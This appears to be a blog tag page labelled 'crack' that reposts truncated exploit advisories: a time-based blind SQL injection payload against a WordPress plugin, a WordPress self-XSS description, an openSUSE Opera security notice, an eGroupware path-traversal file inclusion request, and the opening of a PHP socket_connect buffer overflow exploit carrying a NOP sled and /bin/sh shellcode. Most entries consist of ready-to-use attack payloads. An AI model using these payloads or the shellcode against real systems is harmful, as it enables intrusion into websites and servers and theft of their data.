Tag: crack

WordPress PureHTML plugin <= 1.0.0 SQL Injection

by little_oak

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off ————— PoC (POST data) ————— http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1′ AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— if(!isset($_POST[‘PureHTMLNOnce’])){ if ( !db_unx_verify_nonce( $_POST[‘PureHTMLNOnce’], …

Continue Reading

Exploit for WordPress core 3.1.3 Persistent SELF XSS Vulnerability

by little_oak

Title: WordPress core 3.1.3 self-XSS Author: Jelmer de Hen Software link: http://wordpress.org/download/Version: 3.1.3 WordPress 3.1.3 has a self-XSS vulnerability in the following pages:/wp-admin/user-edit.php?user_id=<uid>/wp-admin/profile.php By putting Javascript inside the input elements “first_name”, “last_name” or “nickname” the self-XSS will trigger 3 times. More information: http://h.ackack.net/0day-xss-in-wordpress-core.html   Fonte: http://www.exploit-db.com/exploits/17454/

Continue Reading

Vulnerabilidade do Opera Browser no Opensuse 11.x

by little_oak

From: opensuse-security@opensuse.org To: opensuse-security-announce@opensuse.org Subject: [security-announce] openSUSE-SU-2011:0688-1: important: opera Date: Fri, 24 Jun 2011 15:08:26 +0200 (CEST) Message-ID: <20110624130826.38F8A32350@maintenance.suse.de> openSUSE Security Update: opera ______________________________________________________________________________ Announcement ID: openSUSE-SU-2011:0688-1 Rating: important References: #694567 Affected Products: openSUSE 11.4 openSUSE 11.3 ______________________________________________________________________________ An update that contains security fixes can now be installed. It includes one version update. Description: opera …

Continue Reading

eGroupware 1.8.001.20110421 Multiple Vulnerabilities

by little_oak

———————————————————————— Software…………….eGroupware 1.8.001.20110421 Vulnerability………..Local File Inclusion Threat Level…………Critical (4/5) Download…………….http://www.egroupware.org/ Discovery Date……….5/19/2011 Tested On……………Windows Vista + XAMPP ———————————————————————— Author………………AutoSec Tools Site………………..http://www.autosectools.com/ Email……………….John Leitch <john@autosectools.com> ———————————————————————— –Description– A local file inclusion vulnerability in eGroupware 1.8.001.20110421 can be exploited to include arbitrary files. –PoC– http://localhost/egroupware/admin/remote.php?uid=a&type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg&creator_email=a ———————————————————————— Software…………….eGroupware 1.8.001.20110421 Vulnerability………..Open Redirect Threat Level…………Low (1/5) Download…………….http://www.egroupware.org/ Discovery Date……….5/19/2011 Tested …

Continue Reading

PHP inferior ou igual a 5.3.5 socket_connect() Buffer Overflow Vulnerability

by little_oak

<?php // Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian // Affected Versions: 5.3.3-5.3.6 echo “[+] CVE-2011-1938”; echo “[+] there we go…\n”; define(‘EVIL_SPACE_ADDR’, “\xff\xff\xee\xb3”); define(‘EVIL_SPACE_SIZE’, 1024*1024*8); $SHELLCODE = “\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0”. “\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1”. “\xcd\x80”; echo “[+] creating the sled.\n”; $CODE = str_repeat(“\x90”, EVIL_SPACE_SIZE); for ($i = 0, $j = EVIL_SPACE_SIZE – strlen($SHELLCODE) – 1 ; $i < strlen($SHELLCODE) …

Continue Reading